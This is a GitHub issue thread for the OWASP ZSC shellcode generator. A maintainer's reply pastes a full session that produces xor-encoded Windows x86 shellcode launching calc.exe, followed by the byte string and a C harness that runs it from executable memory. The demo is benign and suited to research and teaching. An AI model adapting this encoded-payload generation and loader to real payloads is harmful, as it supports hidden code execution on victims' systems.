

Ali-Razmjoo commented on July 22, 2024

Hi,

Can you please share the file, or the exact command, you used to generate the shellcode?

Regards.


moaeddy commented on July 22, 2024

listen.zip

attached is the generated file


moaeddy commented on July 22, 2024

I have been waiting for your response — can't this be reproduced as an .exe?


Ali-Razmjoo commented on July 22, 2024

Hi, sorry for my late answer. You encoded the file wrong: it has `eval(<some value>)` at the end, which has nothing to do with the .c file or with the shellcode bytes.

  • here is a sample command
  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86      osx_x86        windows_x86    windows_x86_64
zsc/shellcode/generate> w
windows_x86    windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe

[+] file_to_execute set to "test/calc.exe"

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue


[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> y


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx

push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx


push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax


Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0

Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com

Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code (shown in its pre-encoding form; the byte string below is the
xor_random-encoded output, where each string-push immediate is rebuilt at
run time with a push/pop/xor sequence instead of appearing literally):


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x456e6957
push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx
push $0x65909090
pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx

push $0x78652e63
push $0x6c61632f
push $0x74736574

xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x636f7250
push   $0x74697845
push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax




compile example(osx_x86): gcc -m32  -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32  -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -m32 -o shellcode_compiled.exe shellcode.c   (the payload is 32-bit x86 code and walks the 32-bit PEB via fs:0x30, so it must be built into a 32-bit executable)
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/



/*
 * Generated windows_x86 payload, xor_random-encoded, 278 bytes.
 *
 * What the bytes do (from the assembly listing above):
 *   1. Walk the PEB (fs:[0x30]) -> Ldr -> InMemoryOrderModuleList to the
 *      third module entry and read its DllBase; the payload assumes that
 *      entry is kernel32.dll (typical load order: exe, ntdll, kernel32).
 *   2. Scan that module's export name table for "GetProcAddress"
 *      (compared in three 4-byte chunks: "GetP", "rocA", "ddre") and
 *      resolve its address through the ordinal/address tables.
 *   3. GetProcAddress(kernel32, "WinExec") and WinExec("test/calc.exe", 1)
 *      (uCmdShow = 1). The path is relative, so what is actually launched
 *      depends on the working directory the harness is started from.
 *   4. GetProcAddress(kernel32, "ExitProcess") and ExitProcess(0), so the
 *      process terminates inside the payload and never returns to main().
 *
 * The API/file-name strings do not appear literally in the bytes: each
 * 4-byte chunk is stored as (key, key ^ value) and rebuilt on the stack
 * with push/pop/xor, which is what "Encode: xor_random" refers to.
 *
 * The payload contains no 0x00 byte, so strlen(shellcode) == 278 matches
 * the "Length" field in the header. Kept as a writable `char *` to
 * preserve the interface used by main().
 */
char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
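/*
 * Test harness entry point: transfers control to the embedded payload.
 *
 * Per the assembly listing in the header, the payload resolves
 * GetProcAddress from kernel32 via the PEB, calls WinExec("test/calc.exe", 1)
 * and then ExitProcess(0). On success control therefore never comes back
 * here and `return 0` is not reached.
 *
 * `shellcode` is a string literal, which the compiler places in a read-only
 * data section. Where DEP/NX is enforced for the process, that page is not
 * executable and the original direct call faults on the first instruction.
 * On Windows the bytes are therefore first copied into a page allocated
 * with PAGE_EXECUTE_READWRITE. (RWX memory is acceptable here only because
 * this is a throwaway harness for exercising generated shellcode.)
 *
 * Returns 0 if the payload ever returns, 1 if the executable page could not
 * be allocated.
 */
int main(void)
{
        /* The payload contains no 0x00 byte (see the listing), so strlen()
         * yields its full length (278, matching the "Length" header line). */
        size_t len = strlen(shellcode);

#ifdef _WIN32
        void *exec_mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                                      PAGE_EXECUTE_READWRITE);
        if (exec_mem == NULL) {
                fputs("VirtualAlloc failed: cannot map executable memory\n",
                      stderr);
                return 1;
        }
        memcpy(exec_mem, shellcode, len);
        /* Object-to-function pointer cast: not portable C, but accepted by
         * gcc/mingw and the same idiom the generator emitted. */
        ((void (*)(void)) exec_mem)();
#else
        /* Non-Windows builds keep the generator's direct call. The payload
         * is Windows-only anyway; on Linux/macOS this needs an executable
         * data mapping (e.g. -z execstack) to get past the first byte. */
        (void) len;
        ((void (*)(void)) shellcode)();
#endif
        return 0;
}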

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>

Did you use JSFuck encoding (or something similar) by accident? That will not work for C code. (Check line 113 of the file you attached.)

